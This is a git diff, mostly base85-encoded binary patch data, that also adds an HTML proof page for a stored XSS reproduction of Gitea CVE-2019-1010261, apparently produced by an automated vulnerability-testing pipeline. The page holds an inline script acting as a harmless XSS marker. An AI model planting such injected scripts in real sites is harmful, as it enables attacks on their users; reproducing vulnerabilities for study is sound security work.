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
UYl|0<&IrT}RV|e~Wy{e20C))3YybcN

literal 0
HcmV?d00001

diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html
new file mode 100644
index 00000000..eab761c4
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html
@@ -0,0 +1,26 @@
+<!DOCTYPE html><html lang="zh-CN" data-xss-proof="true"><head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Gitea Stored XSS Fixture - proof</title>
+  <style>
+    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }
+    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }
+    .proof { padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }
+    .baseline { padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }
+    code { background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }
+  </style>
+</head>
+<body>
+  <main>
+    <h1>Gitea Stored XSS Fixture</h1>
+    <p>Stored payload rendering path for browser proof capture.</p>
+    <div class="proof">Proof active: stored payload rendered inside the browser proof page</div>
+    <p>System: <code>gitea</code> / Family: <code>xss</code></p>
+    
+    <script>document.documentElement.setAttribute('data-xss-proof','true');document.title = "Gitea Stored XSS Fixture - proof";</script><div id="xss-proof">XSS marker executed for gitea--CVE-2019-1010261</div>
+    
+    
+    
+  </main>
+
+</body></html>
\ No newline at end of file
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png
new file mode 100644
index 0000000000000000000000000000000000000000..034be1aa19b1c75594bfe8cd0a63455f87ea6c86
GIT binary patch
literal 37970
zcmd>mS5#A78zw5K2*M{Q2nZ-eI!N!Jf|SrZ1VZl+kX`~oR6u$U(t8P2O6WzU_YP75
z(rYN8_c?t3`Y&d#=4RHcHRDaf$w|&h_TKM)+H0_?vh3qWl#g(5a30IcNvq@F-~mtX
